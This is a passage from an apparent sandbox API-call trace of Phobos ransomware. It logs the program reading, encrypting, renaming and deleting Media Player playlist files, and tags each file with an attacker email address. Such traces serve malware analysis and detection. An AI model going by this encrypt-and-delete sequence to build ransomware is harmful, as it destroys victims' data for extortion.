Playlists\\en-US\\0000E713\\12_All_Video.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0186.994] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0186.994] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0186.994] ReadFile (in: hFile=0x194, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x437, lpOverlapped=0x0) returned 1 [0187.042] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x440, dwBufLen=0x440 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x440) returned 1 [0187.042] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x440, lpOverlapped=0x0) returned 1 [0187.042] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0187.042] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0187.043] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0187.043] CryptDestroyKey (hKey=0xa32c28) returned 1 [0187.043] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0187.043] CryptDestroyKey (hKey=0xa32a28) returned 1 [0187.043] CloseHandle (hObject=0x194) returned 1 [0187.043] CloseHandle (hObject=0x134) returned 1 [0187.043] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\12_All_Video.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\12_all_video.wpl")) returned 1 [0187.044] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0187.044] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0187.045] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1267) returned 1 [0187.045] CloseHandle (hObject=0x134) returned 1 [0187.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl")) returned 0x2020 [0187.045] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0187.045] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0187.045] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0187.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0187.046] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a28) returned 1 [0187.046] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0187.046] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x4f3, lpOverlapped=0x0) returned 1 [0187.060] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500, dwBufLen=0x500 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x500) returned 1 [0187.060] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x500, lpOverlapped=0x0) returned 1 [0187.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a68) returned 1 [0187.061] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0187.061] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0187.061] CryptDestroyKey (hKey=0xa32a68) returned 1 [0187.061] WriteFile (in: hFile=0x194, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0187.061] CryptDestroyKey (hKey=0xa32a28) returned 1 [0187.061] CloseHandle (hObject=0x134) returned 1 [0187.061] CloseHandle (hObject=0x194) returned 1 [0187.834] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\03_Music_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\03_music_rated_at_4_or_5_stars.wpl")) returned 1 [0187.835] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0187.835] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0187.840] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=797) returned 1 [0187.840] CloseHandle (hObject=0x134) returned 1 [0187.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl")) returned 0x2020 [0187.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0187.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0187.840] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0187.840] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0187.840] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0187.841] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0187.841] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0187.841] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x31d, lpOverlapped=0x0) returned 1 [0188.277] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x320, dwBufLen=0x320 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x320) returned 1 [0188.277] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x320, lpOverlapped=0x0) returned 1 [0188.278] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0188.278] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.278] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0188.278] CryptDestroyKey (hKey=0xa32a28) returned 1 [0188.279] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0188.279] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.279] CloseHandle (hObject=0x134) returned 1 [0188.279] CloseHandle (hObject=0x178) returned 1 [0188.279] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl")) returned 1 [0188.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.280] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.280] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1040) returned 1 [0188.280] CloseHandle (hObject=0x178) returned 1 [0188.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl")) returned 0x2020 [0188.281] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.281] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.281] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.281] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.281] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0188.281] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.281] ReadFile (in: hFile=0x178, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x410, lpOverlapped=0x0) returned 1 [0188.285] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420, dwBufLen=0x420 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x420) returned 1 [0188.285] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x420, lpOverlapped=0x0) returned 1 [0188.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa327e8) returned 1 [0188.286] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.286] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0188.286] CryptDestroyKey (hKey=0xa327e8) returned 1 [0188.286] WriteFile (in: hFile=0x134, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0188.286] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.286] CloseHandle (hObject=0x178) returned 1 [0188.286] CloseHandle (hObject=0x134) returned 1 [0188.286] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl")) returned 1 [0188.287] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.288] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1020) returned 1 [0188.288] CloseHandle (hObject=0x134) returned 1 [0188.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl")) returned 0x2020 [0188.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0188.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0188.288] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.288] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0188.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32a68) returned 1 [0188.289] CryptSetKeyParam (hKey=0xa32a68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.289] ReadFile (in: hFile=0x134, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x3fc, lpOverlapped=0x0) returned 1 [0188.295] CryptEncrypt (in: hKey=0xa32a68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x400, dwBufLen=0x400 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x400) returned 1 [0188.295] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x400, lpOverlapped=0x0) returned 1 [0188.296] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32de8) returned 1 [0188.296] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0188.296] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0188.296] CryptDestroyKey (hKey=0xa32de8) returned 1 [0188.296] WriteFile (in: hFile=0x178, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0188.296] CryptDestroyKey (hKey=0xa32a68) returned 1 [0188.296] CloseHandle (hObject=0x134) returned 1 [0188.296] CloseHandle (hObject=0x178) returned 1 [0188.296] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl")) returned 1 [0188.297] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0188.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0188.298] GetFileSizeEx (in: hFile=0x178, 